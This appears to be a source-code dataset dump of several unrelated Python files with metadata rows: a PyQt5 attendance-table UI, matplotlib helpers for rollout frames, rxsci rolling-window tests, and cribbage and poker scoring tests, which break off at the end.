item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(21, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(21, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(21, 2, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(22, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(22, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(22, 2, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(23, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(23, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(23, 2, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(24, 0, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(24, 1, item)
item = QtWidgets.QTableWidgetItem()
item.setFlags(QtCore.Qt.ItemIsSelectable|QtCore.Qt.ItemIsDragEnabled|QtCore.Qt.ItemIsEnabled)
self.table.setItem(24, 2, item)
self.table.horizontalHeader().setCascadingSectionResizes(False)
self.table.horizontalHeader().setDefaultSectionSize(130)
self.table.horizontalHeader().setMinimumSectionSize(50)
self.table.horizontalHeader().setSortIndicatorShown(True)
self.table.verticalHeader().setCascadingSectionResizes(True)
self.table.verticalHeader().setDefaultSectionSize(50)
self.table.verticalHeader().setMinimumSectionSize(50)
self.table.verticalHeader().setSortIndicatorShown(False)
self.section = QtWidgets.QSpinBox(self.centralwidget)
self.section.setGeometry(QtCore.QRect(270, 18, 431, 31))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 127, 63))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 127, 63))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 127, 63))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.section.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(10)
self.section.setFont(font)
self.section.setMinimum(1)
self.section.setMaximum(12)
self.section.setObjectName("section")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(170, 20, 71, 23))
font = QtGui.QFont()
font.setPointSize(14)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName("label")
self.back = QtWidgets.QPushButton(self.centralwidget)
self.back.setGeometry(QtCore.QRect(10, 16, 131, 41))
font = QtGui.QFont()
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
self.back.setFont(font)
self.back.setObjectName("back")
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.table.setSortingEnabled(False)
item = self.table.horizontalHeaderItem(0)
item.setText(_translate("MainWindow", "Name"))
item = self.table.horizontalHeaderItem(1)
item.setText(_translate("MainWindow", "UserID"))
item = self.table.horizontalHeaderItem(2)
item.setText(_translate("MainWindow", "No.Absent"))
item = self.table.horizontalHeaderItem(3)
item.setText(_translate("MainWindow", "ExamBlocked"))
item = self.table.horizontalHeaderItem(4)
item.setText(_translate("MainWindow", "MidTerm"))
__sortingEnabled = self.table.isSortingEnabled()
self.table.setSortingEnabled(False)
item = self.table.item(0, 0)
item.setText(_translate("MainWindow", "j"))
self.table.setSortingEnabled(__sortingEnabled)
self.label.setText(_translate("MainWindow", "Section"))
self.back.setText(_translate("MainWindow", "Back"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| 57.416873
| 127
| 0.692727
| 2,498
| 23,139
| 6.406725
| 0.078062
| 0.101975
| 0.103287
| 0.115471
| 0.831292
| 0.821607
| 0.817796
| 0.791802
| 0.791802
| 0.789615
| 0
| 0.027059
| 0.191841
| 23,139
| 402
| 128
| 57.559701
| 0.82877
| 0.007995
| 0
| 0.534884
| 1
| 0
| 0.008916
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005168
| false
| 0
| 0.005168
| 0
| 0.01292
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa79e025e0c0006ec081d79a163463cdc1c4b17a
| 4,154
|
py
|
Python
|
evkit/utils/viz/rl.py
|
joel99/midlevel-reps
|
f0b4a4d8ccf09a0488cd18af24723172aff99446
|
[
"MIT"
] | 120
|
2019-04-22T04:45:28.000Z
|
2022-03-23T01:53:17.000Z
|
evkit/utils/viz/rl.py
|
joel99/midlevel-reps
|
f0b4a4d8ccf09a0488cd18af24723172aff99446
|
[
"MIT"
] | 14
|
2019-06-12T08:21:21.000Z
|
2021-08-25T15:36:58.000Z
|
evkit/utils/viz/rl.py
|
joel99/midlevel-reps
|
f0b4a4d8ccf09a0488cd18af24723172aff99446
|
[
"MIT"
] | 19
|
2019-06-19T07:00:36.000Z
|
2022-03-24T07:18:30.000Z
|
from .core import rescale_image
import matplotlib.pyplot as plt
import numpy as np
import torch
def plot_stacked_frames(stacked_observations, rollout_idx=0, axis_order='RCWH', im_val_scale=(0.0, 1.0), noshow=False):
''' Parameters:
stacked_obs: a StackedObservationStorage object
rollout_idx: which rollout to visualize
axis_order: RCWH = RolloutIdx x Channel x Width x Height
im_val_scale: If image is a float, the range of the inputs
noshow: Not implemented
'''
if noshow:
raise NotImplementedError("Bug! Noshow not yet implemented")
assert axis_order in ['RCWH', 'RWHC']
fig, ax = plt.subplots(figsize=(15, 15))
n_stacked = stacked_observations.n_stack
for i, start in enumerate(range(0, stacked_observations.obs_shape[0], stacked_observations.env_shape_dim0)):
frame = stacked_observations.obs[rollout_idx, start:start+stacked_observations.env_shape_dim0]
if frame.dtype in [np.float32, torch.float32]:
frame = rescale_image(frame, (0.0, 1.0), current_scale=im_val_scale)
if axis_order == 'RCWH':
frame = np.rollaxis(frame, 0, 3)
if frame.shape[-1] == 1:
frame = frame.squeeze(-1)
plt.subplot(1, n_stacked, i + 1)
print(frame.shape)
plt.imshow(frame)
plt.title('{} of {}'.format(i, n_stacked))
plt.tight_layout()
if not noshow:
plt.show()
def plot_rollout_frames(rollouts, rollout_idx=0, axis_order='RCWH', im_val_scale=(0.0, 1.0), noshow=False,
n_channels=3, timestep=0):
''' Parameters:
stacked_obs: a StackedObservationStorage object
rollout_idx: which rollout to visualize
axis_order: RCWH = RolloutIdx x Channel x Width x Height
im_val_scale: If image is a float, the range of the inputs
noshow: Not implemented
'''
obs = rollouts.observations[timestep]
n_stacked = obs.shape[1] // n_channels
if noshow:
raise NotImplementedError("Bug! Noshow not yet implemented")
assert axis_order in ['RCWH', 'RWHC']
fig, ax = plt.subplots(figsize=(15, 15))
for i, start in enumerate(range(0, obs.shape[1], n_channels)):
frame = obs[rollout_idx, start:start+n_channels]
if frame.dtype in [np.float32, torch.float32]:
frame = rescale_image(frame, (0.0, 1.0), current_scale=im_val_scale)
if axis_order == 'RCWH':
frame = np.rollaxis(frame, 0, 3)
if frame.shape[-1] == 1:
frame = frame.squeeze(-1)
plt.subplot(1, n_stacked, i + 1)
plt.imshow(frame)
plt.title('{} of {}'.format(i, n_stacked))
plt.tight_layout()
if not noshow:
plt.show()
from teas.utils.viz.core import rescale_image
def plot_rollout_sensor_frames(rollouts, rollout_idx=0, axis_order='RCWH', im_val_scale=(0.0, 1.0), noshow=False,
n_channels=3, timestep=0, sensor_name='color__pinhole'):
''' Parameters:
stacked_obs: a StackedObservationStorage object
rollout_idx: which rollout to visualize
axis_order: RCWH = RolloutIdx x Channel x Width x Height
im_val_scale: If image is a float, the range of the inputs
noshow: Not implemented
'''
obs = rollouts.observations[sensor_name][timestep]
n_stacked = obs.shape[1] // n_channels
if noshow:
raise NotImplementedError("Bug! Noshow not yet implemented")
assert axis_order in ['RCWH', 'RWHC']
fig, ax = plt.subplots(figsize=(15, 15))
for i, start in enumerate(range(0, obs.shape[1], n_channels)):
frame = obs[rollout_idx, start:start+n_channels]
if frame.dtype in [np.float32, torch.float32]:
frame = rescale_image(frame, (0.0, 1.0), current_scale=im_val_scale)
if axis_order == 'RCWH':
frame = np.rollaxis(frame, 0, 3)
if frame.shape[-1] == 1:
frame = frame.squeeze(-1)
plt.subplot(1, n_stacked, i + 1)
plt.imshow(frame)
plt.title('{} of {}'.format(i, n_stacked))
plt.tight_layout()
if not noshow:
plt.show()
| 41.959596
| 119
| 0.639384
| 578
| 4,154
| 4.434256
| 0.16782
| 0.042138
| 0.04565
| 0.009364
| 0.874366
| 0.841202
| 0.841202
| 0.831057
| 0.831057
| 0.831057
| 0
| 0.027511
| 0.247472
| 4,154
| 99
| 120
| 41.959596
| 0.792386
| 0.173086
| 0
| 0.771429
| 0
| 0
| 0.05454
| 0
| 0
| 0
| 0
| 0
| 0.042857
| 1
| 0.042857
| false
| 0
| 0.071429
| 0
| 0.114286
| 0.014286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
faabd22908b9fbbcd541b9f6689e84ccb55e5aca
| 5,498
|
py
|
Python
|
tests/data/test_roll.py
|
maki-nage/rxsci
|
64c9956752cbdd4c65aa9f054b6b28318a056625
|
[
"MIT"
] | 3
|
2021-05-03T13:40:46.000Z
|
2022-03-06T07:59:30.000Z
|
tests/data/test_roll.py
|
maki-nage/rxsci
|
64c9956752cbdd4c65aa9f054b6b28318a056625
|
[
"MIT"
] | 9
|
2020-10-22T21:08:10.000Z
|
2021-08-05T09:01:26.000Z
|
tests/data/test_roll.py
|
maki-nage/rxsci
|
64c9956752cbdd4c65aa9f054b6b28318a056625
|
[
"MIT"
] | 2
|
2021-01-05T16:48:54.000Z
|
2021-08-07T12:51:01.000Z
|
import rx
import rx.operators as ops
import rxsci as rs
from ..utils import on_probe_state_topology
def test_roll():
source = [
rs.OnCreateMux((1,)),
rs.OnNextMux((1,), 1),
rs.OnNextMux((1,), 2),
rs.OnNextMux((1,), 3),
rs.OnNextMux((1,), 4),
rs.OnNextMux((1,), 5),
rs.OnCompletedMux((1,)),
]
actual_result = []
mux_actual_result = []
def on_next(i):
actual_result.append(i)
store = rs.state.StoreManager(store_factory=rs.state.MemoryStore)
rx.from_(source).pipe(
rs.cast_as_mux_observable(),
rs.state.with_store(
store,
rs.data.roll(window=3, stride=3, pipeline=rx.pipe(
ops.do_action(mux_actual_result.append),
)),
),
).subscribe(on_next)
assert actual_result == source
assert type(mux_actual_result[0]) is rs.state.ProbeStateTopology
assert mux_actual_result[1:] == [
rs.OnCreateMux((1, (1,)), store),
rs.OnNextMux((1, (1,)), 1, store),
rs.OnNextMux((1, (1,)), 2, store),
rs.OnNextMux((1, (1,)), 3, store),
rs.OnCompletedMux((1, (1,)), store),
rs.OnCreateMux((1, (1,)), store),
rs.OnNextMux((1, (1,)), 4, store),
rs.OnNextMux((1, (1,)), 5, store),
rs.OnCompletedMux((1, (1,)), store),
]
def test_roll_with_stride():
source = [
rs.OnCreateMux((0 ,)),
rs.OnNextMux((0,), 1),
rs.OnNextMux((0,), 2),
rs.OnNextMux((0,), 3),
rs.OnNextMux((0,), 4),
rs.OnNextMux((0,), 5),
rs.OnNextMux((0,), 6),
rs.OnCompletedMux((0,)),
]
actual_result = []
mux_actual_result = []
def on_next(i):
actual_result.append(i)
store = rs.state.StoreManager(store_factory=rs.state.MemoryStore)
rx.from_(source).pipe(
rs.cast_as_mux_observable(),
rs.state.with_store(
store,
rs.data.roll(window=3, stride=2, pipeline=rx.pipe(
ops.do_action(mux_actual_result.append),
)),
),
).subscribe(on_next)
assert type(mux_actual_result[0]) is rs.state.ProbeStateTopology
assert mux_actual_result[1:] == [
rs.OnCreateMux((0, (0,)), store),
rs.OnNextMux((0, (0,)), 1, store),
rs.OnNextMux((0, (0,)), 2, store),
rs.OnCreateMux((1, (0,)), store),
rs.OnNextMux((0, (0,)), 3, store),
rs.OnCompletedMux((0, (0,)), store),
rs.OnNextMux((1, (0,)), 3, store),
rs.OnNextMux((1, (0,)), 4, store),
rs.OnCreateMux((0, (0,)), store),
rs.OnNextMux((0, (0,)), 5, store),
rs.OnNextMux((1, (0,)), 5, store),
rs.OnCompletedMux((1, (0,)), store),
rs.OnNextMux((0, (0,)), 6, store),
rs.OnCompletedMux((0, (0,)), store),
]
def test_roll_identity():
source = [
rs.OnCreateMux((1,)),
rs.OnNextMux((1,), 1),
rs.OnNextMux((1,), 2),
rs.OnNextMux((1,), 3),
rs.OnNextMux((1,), 4),
rs.OnCompletedMux((1,)),
]
actual_result = []
mux_actual_result = []
def on_next(i):
actual_result.append(i)
store = rs.state.StoreManager(store_factory=rs.state.MemoryStore)
rx.from_(source).pipe(
rs.cast_as_mux_observable(),
rs.state.with_store(
store,
rs.data.roll(1, 1, pipeline=rx.pipe(
ops.do_action(mux_actual_result.append),
)),
),
).subscribe(on_next)
assert actual_result == source
assert type(mux_actual_result[0]) is rs.state.ProbeStateTopology
assert mux_actual_result[1:] == [
rs.OnCreateMux((1, (1,)), store),
rs.OnNextMux((1, (1,)), 1, store),
rs.OnCompletedMux((1, (1,)), store),
rs.OnCreateMux((1, (1,)), store),
rs.OnNextMux((1, (1,)), 2, store),
rs.OnCompletedMux((1, (1,)), store),
rs.OnCreateMux((1, (1,)), store),
rs.OnNextMux((1, (1,)), 3, store),
rs.OnCompletedMux((1, (1,)), store),
rs.OnCreateMux((1, (1,)), store),
rs.OnNextMux((1, (1,)), 4, store),
rs.OnCompletedMux((1, (1,)), store),
]
def test_roll_count_without_store():
actual_error = []
rx.from_([1, 2, 3, 4]).pipe(
rs.data.roll(window=3, stride=3, pipeline=rx.pipe(
)),
).subscribe(on_error=actual_error.append,)
assert type(actual_error[0]) is ValueError
def test_roll_without_store():
actual_error = []
rx.from_([1, 2, 3, 4]).pipe(
rs.data.roll(window=3, stride=2, pipeline=rx.pipe(
)),
).subscribe(on_error=actual_error.append)
assert type(actual_error[0]) is ValueError
def test_forward_topology_probe_1():
actual_topology_probe = []
source = [1, 2, 3, 4]
rx.from_(source).pipe(
rs.state.with_memory_store(
rx.pipe(
rs.data.roll(1, 1, pipeline=rx.pipe()),
on_probe_state_topology(actual_topology_probe.append),
)
),
).subscribe()
assert len(actual_topology_probe) == 1
def test_forward_topology_probe_2():
actual_topology_probe = []
source = [1, 2, 3, 4]
rx.from_(source).pipe(
rs.state.with_memory_store(
rx.pipe(
rs.data.roll(2, 1, pipeline=rx.pipe()),
on_probe_state_topology(actual_topology_probe.append),
)
),
).subscribe()
assert len(actual_topology_probe) == 1
| 27.083744
| 70
| 0.548381
| 693
| 5,498
| 4.181818
| 0.08658
| 0.091787
| 0.086957
| 0.037267
| 0.900621
| 0.849551
| 0.830228
| 0.816425
| 0.81539
| 0.772602
| 0
| 0.041385
| 0.274827
| 5,498
| 202
| 71
| 27.217822
| 0.685478
| 0
| 0
| 0.725
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075
| 1
| 0.0625
| false
| 0
| 0.025
| 0
| 0.0875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fabb9304670100fdfece1a33c498042276288c86
| 5,294
|
py
|
Python
|
ch_12/tests/test_cards.py
|
real-slim-chadi/Python-Object-Oriented-Programming---4th-edition
|
7c486866171786b620795fa33a79ec9ac9a8ba1b
|
[
"MIT"
] | 43
|
2021-06-03T18:39:09.000Z
|
2022-03-29T20:32:13.000Z
|
ch_12/tests/test_cards.py
|
real-slim-chadi/Python-Object-Oriented-Programming---4th-edition
|
7c486866171786b620795fa33a79ec9ac9a8ba1b
|
[
"MIT"
] | 9
|
2022-03-12T01:04:07.000Z
|
2022-03-12T01:05:01.000Z
|
ch_12/tests/test_cards.py
|
real-slim-chadi/Python-Object-Oriented-Programming---4th-edition
|
7c486866171786b620795fa33a79ec9ac9a8ba1b
|
[
"MIT"
] | 36
|
2021-06-19T07:14:09.000Z
|
2022-03-12T22:17:09.000Z
|
"""
Python 3 Object-Oriented Programming
Chapter 12. Advanced Python Design Patterns
"""
from pytest import *
import card_games
def test_cribbage_hand():
factory = card_games.CribbageFactory()
cards = [
factory.make_card(5, card_games.Suit.Clubs),
factory.make_card(5, card_games.Suit.Diamonds),
factory.make_card(5, card_games.Suit.Hearts),
factory.make_card(11, card_games.Suit.Spades),
]
starter = factory.make_card(5, card_games.Suit.Spades)
hand = factory.make_hand(*cards)
actual = sorted(hand.upcard(starter).scoring())
assert actual == [
card_games.CribbageTrick.Fifteen,
card_games.CribbageTrick.Fifteen,
card_games.CribbageTrick.Fifteen,
card_games.CribbageTrick.Fifteen,
card_games.CribbageTrick.Fifteen,
card_games.CribbageTrick.Fifteen,
card_games.CribbageTrick.Fifteen,
card_games.CribbageTrick.Fifteen,
card_games.CribbageTrick.Pair,
card_games.CribbageTrick.Pair,
card_games.CribbageTrick.Pair,
card_games.CribbageTrick.Pair,
card_games.CribbageTrick.Pair,
card_games.CribbageTrick.Pair,
card_games.CribbageTrick.Right_Jack,
]
def test_poker_hand_sf():
factory = card_games.PokerFactory()
cards = [
factory.make_card(5, card_games.Suit.Clubs),
factory.make_card(6, card_games.Suit.Clubs),
factory.make_card(7, card_games.Suit.Clubs),
factory.make_card(8, card_games.Suit.Clubs),
factory.make_card(9, card_games.Suit.Clubs),
]
hand = factory.make_hand(*cards)
assert hand.scoring() == [card_games.PokerTrick.StraightFlush]
def test_poker_hand_4():
factory = card_games.PokerFactory()
cards = [
factory.make_card(5, card_games.Suit.Clubs),
factory.make_card(5, card_games.Suit.Diamonds),
factory.make_card(5, card_games.Suit.Hearts),
factory.make_card(5, card_games.Suit.Spades),
factory.make_card(6, card_games.Suit.Spades),
]
hand = factory.make_hand(*cards)
assert hand.scoring() == [card_games.PokerTrick.Four]
def test_poker_hand_fh():
factory = card_games.PokerFactory()
cards = [
factory.make_card(5, card_games.Suit.Clubs),
factory.make_card(5, card_games.Suit.Diamonds),
factory.make_card(5, card_games.Suit.Hearts),
factory.make_card(6, card_games.Suit.Spades),
factory.make_card(6, card_games.Suit.Spades),
]
hand = factory.make_hand(*cards)
assert hand.scoring() == [card_games.PokerTrick.FullHouse]
def test_poker_hand_flush():
factory = card_games.PokerFactory()
cards = [
factory.make_card(5, card_games.Suit.Clubs),
factory.make_card(6, card_games.Suit.Clubs),
factory.make_card(7, card_games.Suit.Clubs),
factory.make_card(8, card_games.Suit.Clubs),
factory.make_card(10, card_games.Suit.Clubs),
]
hand = factory.make_hand(*cards)
assert hand.scoring() == [card_games.PokerTrick.Flush]
def test_poker_hand_straight():
factory = card_games.PokerFactory()
cards = [
factory.make_card(5, card_games.Suit.Clubs),
factory.make_card(6, card_games.Suit.Clubs),
factory.make_card(7, card_games.Suit.Clubs),
factory.make_card(8, card_games.Suit.Clubs),
factory.make_card(10, card_games.Suit.Clubs),
]
hand = factory.make_hand(*cards)
assert hand.scoring() == [card_games.PokerTrick.Flush]
def test_poker_hand_3():
factory = card_games.PokerFactory()
cards = [
factory.make_card(5, card_games.Suit.Clubs),
factory.make_card(5, card_games.Suit.Diamonds),
factory.make_card(5, card_games.Suit.Hearts),
